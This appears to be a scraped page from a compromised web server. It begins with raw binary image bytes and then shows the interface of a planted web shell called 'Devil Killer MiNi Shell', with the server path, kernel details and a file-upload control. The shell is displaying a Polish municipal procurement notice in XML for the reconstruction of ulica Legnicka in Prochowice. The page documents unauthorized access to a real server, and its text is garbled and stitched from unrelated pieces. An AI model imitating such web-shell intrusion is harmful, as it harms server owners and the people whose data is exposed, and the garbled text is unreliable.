JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/temp/20170131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/frontend/runtime/temp/20170131/17053_2017.xml

<?xml version="1.0" encoding="utf-8"?><ZP-400><biuletyn>2017</biuletyn><pozycja>17053</pozycja><data_publikacji>2017-01-31</data_publikacji><nazwa>Gmina Prochowice</nazwa><ulica>ul. Rynek</ulica><nr_domu>1</nr_domu><nr_miesz></nr_miesz><miejscowosc>Prochowice</miejscowosc><kod_poczt>59230 </kod_poczt><panstwo>Polska</panstwo><wojewodztwo>dolnośląskie</wojewodztwo><tel>076 8584342 lub 8584343</tel><fax>768 584 581</fax><email>h.choroszczak@prochowice.com.pl</email><internet></internet><adres_strony_internetowej_narzedzia></adres_strony_internetowej_narzedzia><adres_strony_url></adres_strony_url><podmiot2c></podmiot2c><regon>39064751200000</regon><e_mail></e_mail><ogloszenie>Ogłoszenie o zamówieniu</ogloszenie><czy_obowiazkowa>T</czy_obowiazkowa><zamieszczanie_obowiazkowe>T</zamieszczanie_obowiazkowe><nazwa_projektu_programu></nazwa_projektu_programu><czy_ubiegac_zaklady_pracy /><minimalny_procent_zatrudnienia></minimalny_procent_zatrudnienia><czy_przeprowadza_centralny_zamawiajacy /><czy_przeprowadza_podmiot_zamawiajacy_powierzyl /><zamawiajacy_powierzyl></zamawiajacy_powierzyl><czy_przeprowadza_wapolnie /><przeprowadza_wapolnie_podmiot1></przeprowadza_wapolnie_podmiot1><przeprowadza_wapolnie_podmiot2></przeprowadza_wapolnie_podmiot2><czy_przeprowadza_zamawiajacy_z_eu /><postepowanie_wspolne_tresc></postepowanie_wspolne_tresc><informacje_dodatkowe_zamawiajacy></informacje_dodatkowe_zamawiajacy><dotyczy>1</dotyczy><adres_dyn_zak></adres_dyn_zak><rodzaj_zam>administracja samorządowa</rodzaj_zam><wspolne_udzielanie_zamowienia></wspolne_udzielanie_zamowienia><czy_dostep_dokumentow_zamowienia /><dostep_dokumentow_zamowienia></dostep_dokumentow_zamowienia><czy_zamieszczona_bedzie_specyfikacja>T</czy_zamieszczona_bedzie_specyfikacja><zamieszczona_bedzie_specyfikacja>www.bip.prochowice.com  w zakładce ZAMÓWIENIA PUBLICZNE - 2017</zamieszczona_bedzie_specyfikacja><czy_dostep_do_dokumentow_ograniczony /><czy_wymagane_przeslanie_ofert>T</czy_wymagane_przeslanie_ofert><wymagane_przeslanie_ofert_inny>Ofertę składa Wykonawca pod rygorem nieważności w formie pisemnej. Składanie oferty  za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r. – Prawo pocztowe (Dz.U. z 2016r. poz.1113, z póżn.zm.) osobiście lub za pośrednictwem posłańca</wymagane_przeslanie_ofert_inny><czy_podzielone_na_czesci>N</czy_podzielone_na_czesci><oferty_lub_wnioski /><maksymalna_liczba_czesci></maksymalna_liczba_czesci><zastrezega_prawo_grup_czesci></zastrezega_prawo_grup_czesci><maksymalna_liczba_czesci_jednemu_wykonawcy></maksymalna_liczba_czesci_jednemu_wykonawcy><dostep_do_dokumentow_ograniczony></dostep_do_dokumentow_ograniczony><czy_oferty_wnioski_dostepne /><oferty_wnioski_dostepne></oferty_wnioski_dostepne><czy_dopuszczone_wymagane_przeslanie_ofert /><dopuszczone_wymagane_przeslanie_ofert_inny></dopuszczone_wymagane_przeslanie_ofert_inny><dopuszczone_wymagane_przeslanie_ofert_adres>Gmina Prochowice, 59-230 Prochowice, ul. Rynek 1</dopuszczone_wymagane_przeslanie_ofert_adres><czy_komunikacja_elektroniczna_wymaga /><komunikacja_elektroniczna_wymaga></komunikacja_elektroniczna_wymaga><wymagania_dotyczace_rejestracji_wyk_aukcja></wymagania_dotyczace_rejestracji_wyk_aukcja><nazwa_zamowienia>Przebudowa ulicy Legnickiej w ciągu drogi gminnej nr 104587D wraz z infrastrukturą techniczną w drodze.</nazwa_zamowienia><numer_referencyjny>IGP.271.1.2017</numer_referencyjny><czy_dialog_techniczny /><rodz_zam>B</rodz_zam><przedmiot_zam>5.1.	Przedmiotem zamówienia jest kompleksowe wykonanie zadania inwestycyjnego pn  „Przebudowa ulicy Legnickiej w Prochowicach w ciągu drogi gminnej nr 104587D wraz z infrastrukturą techniczną w drodze” według dokumentacji projektowej, wymienionej w pkt 5.2 SIWZ i w rezultacie wykonania oddanie Zamawiającemu należycie przebudowanych obiektów budowlanych, zapewniających prawidłową eksploatację i użytkowanie zgodnie z ich przeznaczeniem.
Do wykonania w ramach zamówienia są robót branży drogowej z kanalizacją deszczową  oraz sieć wodociągową i kanalizację sanitarną.
ROBOTY DROGOWE I KANALIZACJA DESZCZOWA – OPIS:
Inwestycja obejmuje przebudowę istniejącego odcinka ulicy Legnickiej długości 461m od Rynku do początku węzła drogowego na drodze krajowej nr 94 (tylko w granicach działki pasa drogi gminnej) wraz z kanalizacją deszczową. Projektem przebudowy objęto także fragment ul. Kopernika o długości 23 m. Dodatkowo w ramach inwestycji zostaną przebudowane chodniki, skrzyżowania i zjazdy. Zaprojektowano nowy odcinek kanalizacji deszczowej (DN 160-500mm długości 377m) na odcinku od ul. Kopernika do Rynku z włączeniem nowych wpustów i podłączeniem istniejących rur spustowych rynien. Na dalszym ciągu ul. Legnickiej będzie wykorzystany istniejący kanał deszczowy do którego zostaną włączone nowo zaprojektowane wpusty deszczowe.   Powierzchnia bitumiczna jezdni, skrzyżowań i zjazdów  (3114m2),  zjazd z kostki granitowej (401m2), krawężniki granitowe (1067m), chodniki obustronny  (1861m2)  wg zaprojektowanego  wzoru nawierzchni  tj. z płyt granitowych lub płyt betonowych, uzupełnianych kostką granitową lub kostką betonową ( granit tylko na odcinku od Rynku do ul. Ciepłej) oraz 2 rzędami kostki bazaltowej na całej długości (zewnętrznie do krawężnika). 


PO PRZEBUDOWIE ULICA POSIADAĆ BĘDZIE  PARAMETRY TECHNICZNE:
	droga gminna 			- klasa „Z” i „L”, 
	prędkość projektowa 		- 40 km/h, 
	szerokość jezdni 		- 6.00 m,
	szerokość chodników 		- zmienna - min. 1.50 m,
	kategoria ruchu 		- KR2,
	obciążenie 			- 100 kN/oś.

SIEĆ WODOCIĄGOWA I KANALIZACJA SANITARNA - OPIS:
W związku z przebudową nawierzchni ulicy  przewiduje się także budowę i przebudowę istniejącej sieci wodociągowej i kanalizacji sanitarnej w drodze, remont studzienek i naprawę uszkodzonych odcinków kanalizacji oraz wymianę nawierzchni i przebudowę kanalizacji deszczowej (opisanej powyżej). Istniejąca sieć wodociągowa z rur żeliwnych zastąpiona zostanie siecią z rur polietylenowych zgrzewanych. Na nowej sieci zamontowane zostaną hydranty  p-poż., zespół odpowietrzająco – napowietrzający oraz armatura odcinająca. Sieć projektowana zostanie połączona z istniejącą w110 na skrzyżowaniu z ul. Garbarską i wA80 na skrzyżowaniu z ul. Kopernika oraz w rejonie budynku nr 45 przy ul. Legnickiej. Przyłącza do budynków zostaną wymienione na rury PE i wyposażone w odpowiednią armaturę, zgodnie z projektem wykonawczym. W ul. Legnickiej funkcjonuje sieć kanalizacji sanitarnej z rur kamionkowych DN 200 ze studzienkami z kręgów betonowych DN 1200. W związku z przebudową drogi przewiduje się rozbudowę kanalizacji sanitarnej, remont studzienek i naprawę uszkodzonych odcinków kanalizacji z zastosowaniem mat nasączonych żywicą epoksydową tzw. metodą krótkiego rękawa (pakera). W ramach rozbudowy zaprojektowano odcinki kanalizacji w kierunku ulic: Zakątna, Ciepła i Kopernika. Wielkość podstawowych robót do wykonania: razem ~ 710m sieci wodociągowej i sanitarnej. 
5.2.	Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja stanowiąca tom III SIWZ w tym:
1.	Dokumentacja projektowa pn. „Przebudowa ulicy Legnickiej w ciągu drogi gminnej nr 104587D w Prochowicach wraz z infrastrukturą towarzyszącą”, na którą składają się: projekt budowlany zatwierdzony decyzją pozwolenia na budowę, projekt wykonawczy, projekty czasowej i stałej organizacji ruchu, przedmiary robót oraz Specyfikacje techniczne wykonania i odbioru robót.
2.	Dokumentacja projektowa pn „Budowa i przebudowa sieci wodociągowej i kanalizacji. sanitarnej w ul. Legnickiej  w ciągu drogi gminnej nr 104587D w Prochowicach”, na którą składają się: projekt budowlany zatwierdzony decyzją pozwolenia na budowę, projekt wykonawczy, przedmiary robót oraz Specyfikacje techniczne wykonania i odbioru robót.
5.3.	Wszystkie roboty budowlane – obiekty budowlane, opisane dokumentacją stanowiącą tom III SIWZ Wykonawca zobowiązany jest wykonać zgodnie z dokumentacją i zasadami wiedzy technicznej, sztuką budowlaną, obowiązującymi norami i przepisami prawa, na warunkach określonych w zawartej umowie (Istotne dla stron postanowienia umowy stanowią tom II SIWZ). 
</przedmiot_zam><cpv1c>45230000-8</cpv1c><cpv2c>45233000-9</cpv2c><okres2c>180</okres2c><szacunkowa_wart_zam_calosc>2385454.33</szacunkowa_wart_zam_calosc><waluta_calosc>PLN</waluta_calosc><czy_przewiduje_udzielenie_zamowien_67>N</czy_przewiduje_udzielenie_zamowien_67><czy_przewiduje_udzielenie_zamowien_67_tekst></czy_przewiduje_udzielenie_zamowien_67_tekst><czy_czesci /><czy_czesci_wymaga /><ilosc_czesci></ilosc_czesci><ilosc_czesci_max></ilosc_czesci_max><czy_wariant /><czy_uzup /><zam_uzupelniajace></zam_uzupelniajace><czas>
        O
      </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_zak></data_zak><ii_2_lub_temp></ii_2_lub_temp><informacje_na_temat_katalogow>1.	Wszystkie nakłady do wykonania całości zamówienia : robocizna, materiały i sprzęt leżą po stronie wykonawcy i ich wartość należy uwzględnić w cenie ofertowej, która w niniejszym postępowaniu ma charakter wynagrodzenia ryczałtowego. 
2.	Zamawiający wymaga udzielenia gwarancji jakości na wykonany przedmiot  zamówienia (umowy) na okres  nie krótszy niż 3 lata licząc od dnia kolejnego po dacie odbioru końcowego robót (zamówienia). Okres gwarancji  jest jednym z kryteriów oceny ofert.
3.	Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy. Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia. Zamawiający żąda wskazania przez wykonawcę części zamówienia, których wykonanie zamierza powierzyć podwykonawcom, i podania firm podwykonawców (art. 36b ust.1 Pzp).
4.	Zamawiający stosownie do art. 29 ust 3a ustawy Pzp, wymaga aby wszystkie prace fizyczne w tym prace operatorów sprzętu związane z wykonaniem robót drogowych oraz wodociągowo kanalizacyjnych objętych zamówieniem były wykonywane przez osoby zatrudnione na podstawie umowy o pracę. Obowiązek ten dotyczy również podwykonawców – Wykonawca jest zobowiązany zawrzeć w każdej umowie o podwykonawstwo stosowne zapisy zobowiązujące podwykonawców do zatrudnienia na umowę o pracę wszystkich osób wykonujących wskazane wyżej czynności. Szczegółowe zasady dokumentowania zatrudnienia na podstawie umowy o prace ww. osób oraz kontrolowanie tego obowiązku przez Zamawiającego i przewidziane z tego tytułu sankcje określono w Tomie II SIWZ - Istotne dla Stron Postanowienia Umowy.
5.	Zamawiający  nie przewiduje możliwości składania ofert częściowych. 
6.	Zamawiający nie dopuszcza składania ofert wariantowych.
7.	Zamawiający nie przewiduje możliwości udzielenia zamówień, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp, polegających na powtórzeniu podobnych robót budowlanych, zgodnych  z przedmiotem zamówienia podstawowego. 
8.	Zamawiający nie przewiduje udzielania zaliczek, o mowa w art.151a ustawy Pzp.
9.	Rozliczenia dotyczące realizacji przedmiotu zamówienia dokonywane będą w PLN. 
10.	Wykonawca ponosi wszystkie koszty uczestnictwa w niniejszym postępowaniu i Zamawiający nie przewiduje ich zwrotu, z zastrzeżeniem art. 93 ust. 4 Pzp;
11.	Nie przewiduje się zebrania Wykonawców;
12.	Jeżeli w dokumentacjach projektowych lub specyfikacjach technicznych zostało wskazane pochodzenie (marka, znak towarowy, producent, dostawca) niektórych materiałów lub urządzeń, lub normy, aprobaty, specyfikacje  czy systemy – to oznacza, że zostały one użyte wyłącznie w celu wskazania założonego standardu przyjętych rozwiązań i stanowią warunek równoważności dla rozwiązań zamiennych. Wskazaniu takiemu należy przyjąć, że zawsze towarzyszą wyrazy - lub równoważny. Zamawiający informuje, że dopuszcza składanie ofert równoważnych w zakresie wskazanych znaków towarowych, patentów lub pochodzenia, źródła lub szczególnego procesu, który charakteryzuje produkty lub usługi dostarczane przez konkretnego wykonawcę, jednakże zachowane muszą być normy, standardy i parametry techniczne jakimi charakteryzują się wymagane przez Zamawiającego materiały, które zagwarantują realizację robót zgodnie z wydanymi decyzjami, uzgodnieniami itp. Przedstawione parametry przedmiotu zamówienia stanowią minimum techniczne i jakościowe oczekiwane przez Zamawiającego i będą stanowiły podstawę oceny ewentualnych ofert równoważnych. Oferowane przez Wykonawców proponujących materiały równoważne muszą mieć parametry nie gorsze niż wskazane w materiałach przetargowych. W celu potwierdzenia, że Wykonawca oferuje towar o takich samych lub lepszych parametrach w odniesieniu do wyrobu określonego przez Zamawiającego, Wykonawca zobowiązany jest dołączyć do oferty jego szczegółowej specyfikacji itp. Na podstawie załączonych dokumentów Zamawiający stwierdzi, czy proponowany produkt jest równoważny i odpowiada wymaganiom Zamawiającego. Zaoferowanie wyrobu sprzecznego z powyższymi wymaganiami skutkować będzie odrzuceniem oferty. W przypadku braku załączenia do oferty dokumentów, o których wyżej mowa Zamawiający uznaje, że Wykonawca proponuje materiał określony zgodnie z dokumentacjami projektowymi itd. Zamawiający zastrzega sobie prawo wystąpienia do autora dokumentacji projektowej o opinię na temat oferowanych materiałów. Opinia ta może stanowić podstawę do podjęcia przez Zamawiającego decyzji o przyjęciu materiałów równoważnych albo odrzuceniu oferty których z powodu braku równoważności.
</informacje_na_temat_katalogow><okreslenie_warunkow></okreslenie_warunkow><informacje_dodatkowe_okreslenie_warunkow></informacje_dodatkowe_okreslenie_warunkow><sytuacja_finansowa_okreslenie_warunkow>7.2.1a):	W okresie ostatnich trzech latach obrotowych, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, Wykonawca musi posiadać minimalny roczny obrót  3,0 mln PLN  w tym w obszarze objętym zamówieniem z tytułu wykonanych robót drogowych 1,0 mln PLN. 
7.2.1b):	Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez zamawiającego na co najmniej 3,0 mln PLN.
</sytuacja_finansowa_okreslenie_warunkow><sytuacja_finansowa_informacje_dodatkowe>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia :
- warunek  7.2.1a) wykonawcy  muszą spełniać łącznie,
- warunek  7.2.1b)  musi spełniać samodzielnie przynajmniej  jeden  z Wykonawców.
 </sytuacja_finansowa_informacje_dodatkowe><zdolnosc_techniczna_okreslenie_warunkow>7.2.2a):	Wykonawca musi posiadać wiedzę i doświadczenie niezbędne do wykonania przedmiotu zamówienia, tj. musi posiadać udokumentowane wykonanie (zakończenie) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  co najmniej jednego zadania polegającego na budowie  lub przebudowie ulicy miejskiej na odcinku co najmniej 0,5 km wraz z infrastrukturą i siecią uzbrojenia podziemnego tzn. obejmującego roboty rodzajowo zgodne z przedmiotem zamówienia, o wartości brutto zadania co najmniej 2,0 mln PLN. Zamawiający dopuszcza alternatywnie dwa zadania opisane jak wyżej  po co najmniej 1,0 mln PLN każde.
7.2.2b):	Wykonawca musi wskazać osoby, które zostaną skierowane do realizacji zamówienia, legitymujące się kwalifikacjami zawodowymi, doświadczeniem, uprawnieniami odpowiednimi do funkcji, jakie zostaną im powierzone. Wykonawca wykaże, że do wykonania zamówienia dysponuje co najmniej osobami do pełnienia niżej wymienionych funkcji, które spełniają następujące wymagania:
Kierownik Budowy (roboty objęte dokumentacją pkt 5.2.1 SIWZ.) – 1 osoba posiadająca: 
-	uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
-	doświadczenie zawodowe:
1)	co najmniej 5 lat pracy od uzyskania uprawnień oraz
2)	pełnienie funkcji Kierownika Budowy na co najmniej 2 zadaniach, każde  wartości co najmniej 1,0 mln PLN, polegających na budowie/przebudowie ulicy miejskiej z infrastrukturą i uzbrojeniem podziemnym.
Kierownik robót drogowych – 1 osoba posiadająca: 
-	uprawnienia budowlane do kierowania robotami w specjalności drogowej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
-	doświadczenie zawodowe: co najmniej 5 lat od uzyskania uprawnień 
Kierownik Budowy (roboty objęte dokumentacją pkt 5.2.2 SIWZ.) – 1 osoba posiadająca: 
-	uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych bez ograniczeń do kierowania robotami lub odpowiadające im  ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów;
-	doświadczenie zawodowe:
1)	co najmniej 5 lat pracy od uzyskania uprawnień oraz
2)	pełnienie funkcji Kierownika Budowy na co najmniej 2 zadaniach, każde wartości co najmniej 0,5 mln PLN,  polegających na budowie/przebudowie/wymianie sieci wodociągowych i/lub kanalizacyjnych w drodze miejskiej (doświadczenie może dotyczyć każdej z sieci osobno).  
Kierownik robót wodno kanalizacyjnych  – 1 osoba posiadająca:
-	uprawnienia budowlane do kierowania robotami budowlanymi w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych bez ograniczeń do kierowania robotami lub odpowiadające im  ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów;
-	doświadczenie zawodowe: co najmniej 3 lata od uzyskania uprawnień.
</zdolnosc_techniczna_okreslenie_warunkow><zdolnosc_techniczna_informacje_dodatkowe>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia 
-	warunek 7.2.2a)  dotyczący doświadczenia musi spełniać jeden z Wykonawców samodzielnie,
-	warunek 7.2.2b) dotyczący potencjału kadrowego Wykonawcy muszą spełniać  łącznie.
Zamawiający nie dopuszcza łączenia funkcji określonych powyżej w pkt 7.2.2. 
</zdolnosc_techniczna_informacje_dodatkowe><czy_zdolnosc_techniczna_wymaga_wykonawcow>T</czy_zdolnosc_techniczna_wymaga_wykonawcow><czy_zamawiajacy_przewiduje_wykluczenie>T</czy_zamawiajacy_przewiduje_wykluczenie><art_24_ust_5_pkt_1>T</art_24_ust_5_pkt_1><art_24_ust_5_pkt_2 /><art_24_ust_5_pkt_3 /><art_24_ust_5_pkt_4 /><art_24_ust_5_pkt_5 /><art_24_ust_5_pkt_6 /><art_24_ust_5_pkt_7 /><art_24_ust_5_pkt_8 /><czy_oswiadczenie_niepodleganiu_wykluczenia>T</czy_oswiadczenie_niepodleganiu_wykluczenia><czy_oswiadczenie_spelnienie_kryteriow /><zaliczka /><uprawnienie></uprawnienie><wiedza></wiedza><potencjal></potencjal><zdolne></zdolne><sytuacja></sytuacja><sprawozdanie_calosc></sprawozdanie_calosc><lata_obrotowe></lata_obrotowe><oswiadczenie_potwierdzenia_1 /><oswiadczenie_potwierdzenia_2 /><oswiadczenie_potwierdzenia_3 /><oswiadczenie_potwierdzenia_4 /><oswiadczenie_potwierdzenia_5 /><oswiadczenie_potwierdzenia_6 /><oswiadczenie_potwierdzenia_7 /><oswiadczenie_potwierdzenia_8 /><oswiadczenie_potwierdzenia_9 /><oswiadczenie_potwierdzenia_10 /><oswiadczenie_wykluczenia_1 /><oswiadczenie_wykluczenia_2 /><oswiadczenie_wykluczenia_3 /><oswiadczenie_wykluczenia_4 /><oswiadczenie_wykluczenia_5 /><oswiadczenie_wykluczenia_6 /><oswiadczenie_wykluczenia_7 /><dok_podm_zag_1 /><dok_podm_zag_2 /><dok_podm_zag_3 /><dok_podm_zag_4 /><dok_potw_1 /><dok_potw_2 /><dok_potw_3 /><dok_potw_4 /><dok_potw_5 /><dok_potw_6 /><inne_dok_potw></inne_dok_potw><inne_dokumenty></inne_dokumenty><niepelnosprawne /><oswiadczenie_przedlozyc /><inne_dokumenty></inne_dokumenty><wykaz_dokumentow_zaswiadczen>2.	W celu potwierdzenia braku podstaw do wykluczenia Wykonawcy z udziału w postępowaniu:
1.	odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy.
</wykaz_dokumentow_zaswiadczen><zakresie_warunkow_udzialu>1.	W celu potwierdzenia spełniania warunków udziału w postępowaniu, określonych w pkt 7.2 SIWZ
a)	Warunek 7.2.1a) - oświadczenia wykonawcy o rocznym obrocie wykonawcy lub o obrocie wykonawcy w obszarze objętym zamówieniem, za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy – za ten okres.
b)	Warunek 7.2.1b) - dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia  - dokumenty w formie kserokopii potwierdzone za zgodność z oryginałem. 
c)	Warunek 7.2.2a) - wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami,  o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty. Zamawiający nie dołącza formularza do sporządzenia w/w wykazu – forma dowolna z wymaganymi przez Zamawiającego informacjami.
d)	Warunek 7.2.2b) - wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Zamawiający nie dołącza formularza do sporządzenia w/w wykazu – forma dowolna z wymaganymi przez Zamawiającego informacjami. 
10.2.	Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia (propozycja zobowiązania wg formularza D - Zobowiązanie do złożenia tylko na wezwanie Zamawiającego. 
</zakresie_warunkow_udzialu><zakresie_kryteriow_selekcji></zakresie_kryteriow_selekcji><inne_dokumenty_niewymienione>13.3.	Ofertę stanowią wypełniony i podpisany formularz Oferty oraz Kosztorys Ofertowy.Wraz z ofertą powinny być złożone: 
1)	Oświadczenia o których mowa w  pkt 9.2 SIWZ - wg formularza B i C;
2)	Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo winno być załączone w formie oryginału lub notarialnie poświadczonej kopii;
